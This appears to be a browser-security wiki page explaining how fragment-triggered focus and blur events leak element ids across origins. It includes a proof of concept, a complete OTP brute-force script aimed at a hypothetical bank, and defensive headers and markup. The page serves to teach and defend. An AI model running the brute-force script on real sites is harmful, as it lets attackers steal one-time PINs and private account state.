ID Attribute
October 1, 2020
The id attribute is widely used to identify HTML elements. Unfortunately, a cross-origin website can determine whether a given id is set on a focusable element of a page by combining URL fragments with focus events. When https://example.com/foo#bar is loaded, the browser scrolls to the element with id="bar" and, if that element is focusable, focuses it. An attacker can trigger this cross-origin by loading https://example.com/foo#bar in an iframe: if a focusable element with id="bar" exists, the focus event fires on it and focus moves into the frame, so the attacker's own window loses focus and its blur event fires. The attacker cannot see the focus event inside the frame, but the blur event on the embedding page reveals the same thing and can be used for the same purpose [^1]. Elements that are not focusable (a plain div, for instance) are scrolled to but do not take focus, so only focusable elements are detectable this way.
Some web applications set id attributes on focusable elements in a way that discloses user information. Such ids can either contain information directly related to the user (e.g. a secret) or reflect a user state (e.g. account status).
Code snippet
The snippet below presents an example of detecting an id attribute on another site:
```javascript
// Listen for the blur event on our own window: it fires when focus moves
// into the iframe, i.e. when the framed page has a focusable element with
// the id given in the fragment.
window.onblur = () => {
  alert('Focus was lost, so there is a focusable element with the specified ID');
};

var ifr = document.createElement('iframe');
// If the page has a focusable element with id="x" it will gain focus
// when the fragment is processed, e.g. <input id="x" value="test" />
ifr.src = 'https://example.org/#x';
document.body.appendChild(ifr);
```
Info: The above technique doesn't seem to work in Firefox.
Case Scenarios
Some examples of id-attribute-based attacks are:
- A bank allows its clients to generate short numeric One-Time PINs (OTP) in the browser application to authenticate sessions on mobile devices. The bank used the OTP as the id of a button that is used to show the PIN to the client. Because the PIN space is small, an attacker could brute-force it by loading the page in an iframe once per candidate value, placing each candidate in the URL fragment and watching for the blur event, and then use the stolen OTP to compromise the account.
- A web application uses a specific set of predefined ids and HTML elements when an account has a premium status or the user is of a certain gender. The attacker can detect whether a specific id is present on the victim's page and leak the account information.
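The brute-force from the first scenario, written out as an added example (this is not code from the original page or from any bank): each candidate PIN is probed with its own iframe, the probe resolves true if our window receives a blur (focus moved into the frame) and false if the frame finishes loading without taking focus. The target URL https://bank.example/otp, the PIN length and the settle delay are assumptions.

```javascript
// Added example, not from the original page. Sequential brute-force of a
// numeric id via the fragment + focus/blur leak. The target URL is hypothetical.

// Build the probe URL: the candidate id goes into the fragment.
function buildProbeUrl(base, id) {
  const u = new URL(base);
  u.hash = id;
  return u.toString();
}

// Enumerate every zero-padded numeric candidate of the given length
// (e.g. "0000" .. "9999" for a 4-digit PIN).
function* numericCandidates(digits) {
  const max = 10 ** digits;
  for (let i = 0; i < max; i++) {
    yield String(i).padStart(digits, '0');
  }
}

// Probe one id. Resolves true when focus leaves our window (a focusable
// element with that id exists in the frame), false when the frame has loaded
// and focus is still with us after settleMs.
function probeId(base, id, settleMs = 300) {
  return new Promise((resolve) => {
    const ifr = document.createElement('iframe');
    // Keep the frame rendered but off-screen: an element inside a
    // display:none frame cannot receive focus, which would defeat the probe.
    ifr.style.cssText = 'position:absolute;left:-9999px;width:1px;height:1px';
    let done = false;
    const finish = (hit) => {
      if (done) return;
      done = true;
      window.removeEventListener('blur', onBlur);
      ifr.remove();
      resolve(hit);
    };
    const onBlur = () => finish(true);
    // Focus must currently sit in our window for a blur to be observable.
    window.focus();
    window.addEventListener('blur', onBlur);
    // The fragment scroll/focus steps run during load; give them settleMs
    // after the load event before concluding the id is absent.
    ifr.addEventListener('load', () => setTimeout(() => finish(false), settleMs));
    ifr.src = buildProbeUrl(base, id);
    document.body.appendChild(ifr);
  });
}

// Try every candidate in order; return the first one that takes focus.
async function bruteForceOtp(base, digits) {
  for (const pin of numericCandidates(digits)) {
    if (await probeId(base, pin)) return pin;
  }
  return null;
}

// Only runs in a browser (assumed target: a 4-digit PIN at bank.example).
if (typeof document !== 'undefined') {
  bruteForceOtp('https://bank.example/otp', 4)
    .then((pin) => console.log('leaked PIN:', pin));
}
```

Two practical caveats: a blur caused by the user clicking elsewhere is indistinguishable from a hit, so a real probe should re-check a positive result, and if the target sends framing protections every probe resolves false because the frame never renders the page.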
Defense
Info: As of September 2022, an experiment called Portals exists that could allow the attack to work with Framing Protections [^2].

| Document Policies | SameSite Cookies (Lax) | COOP | Framing Protections | Isolation Policies |
|---|---|---|---|---|
| ✔️ | ✔️ | ❌ | ✔️ | FIP |
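How the defenses in the table apply to the bank scenario, as an added example that is not code from the original page or from any real application: the vulnerable markup (the OTP as a button id) next to a hardened version (fixed, non-secret id), and the response headers for framing protection, the Document Policy that disables scroll-to-fragment on load, and a SameSite=Lax session cookie so a framed load arrives without the session. The route, cookie name, OTP value and `force-load-at-top` being the Chromium-implemented Document Policy are assumptions here.

```javascript
// Added example, not the page's or any bank's code. Vulnerable vs hardened
// OTP page plus the headers corresponding to the defense table.

// Vulnerable: the secret itself is the id, so a cross-origin frame pointed at
// /otp#<pin> focuses the button exactly when the guess is right.
function renderOtpPageVulnerable(otp) {
  return `<!doctype html><button id="${otp}" type="button">Show PIN</button>`;
}

// Hardened: fixed, non-secret ids; the PIN lives in a text node, which the
// focus/blur probe cannot distinguish. A frame at /otp#show-pin still
// focuses the button, but that reveals nothing user-specific.
function renderOtpPageHardened(otp) {
  return `<!doctype html><button id="show-pin" type="button">Show PIN</button>` +
         `<span id="pin" hidden>${otp}</span>`;
}

// Headers matching the defense table:
//  - frame-ancestors / X-Frame-Options: the page cannot be framed at all;
//  - Document-Policy force-load-at-top (assumed Chromium policy): opts the
//    document out of scroll-to-fragment on load, the step that moves focus;
//  - SameSite=Lax: the cookie is not sent on a cross-site iframe load, so a
//    framed request is unauthenticated and no OTP is rendered.
function securityHeaders(sessionId) {
  return {
    'Content-Type': 'text/html; charset=utf-8',
    'Content-Security-Policy': "frame-ancestors 'none'",
    'X-Frame-Options': 'DENY',
    'Document-Policy': 'force-load-at-top',
    'Set-Cookie': `session=${sessionId}; Secure; HttpOnly; SameSite=Lax`,
  };
}

// Review check for templates: is the secret exposed as an id attribute?
function exposesSecretAsId(html, secret) {
  return new RegExp(`\\bid=["']${secret}["']`).test(html);
}

// Minimal server serving the hardened page with the headers above.
// The OTP and session id are constructed values for the example.
function startServer(port) {
  const http = require('http');
  const server = http.createServer((req, res) => {
    const otp = '4821';
    res.writeHead(200, securityHeaders('constructed-session-id'));
    res.end(renderOtpPageHardened(otp));
  });
  server.listen(port, () => console.log(`listening on :${port}`));
  return server;
}

if (process.argv.includes('--serve')) startServer(8080);
```

Run with `node defense.js --serve` and request `/otp#4821` from another origin in an iframe: the framing headers stop the page from rendering, and even without them the hardened markup offers no id that depends on the PIN.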